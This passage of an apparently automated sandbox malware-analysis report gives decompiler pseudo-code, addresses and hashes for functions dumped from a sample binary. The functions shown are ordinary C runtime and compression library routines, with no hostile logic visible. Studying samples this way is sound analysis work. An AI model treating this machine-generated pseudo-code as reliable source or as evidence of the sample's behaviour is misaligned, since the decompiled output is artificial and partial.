											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
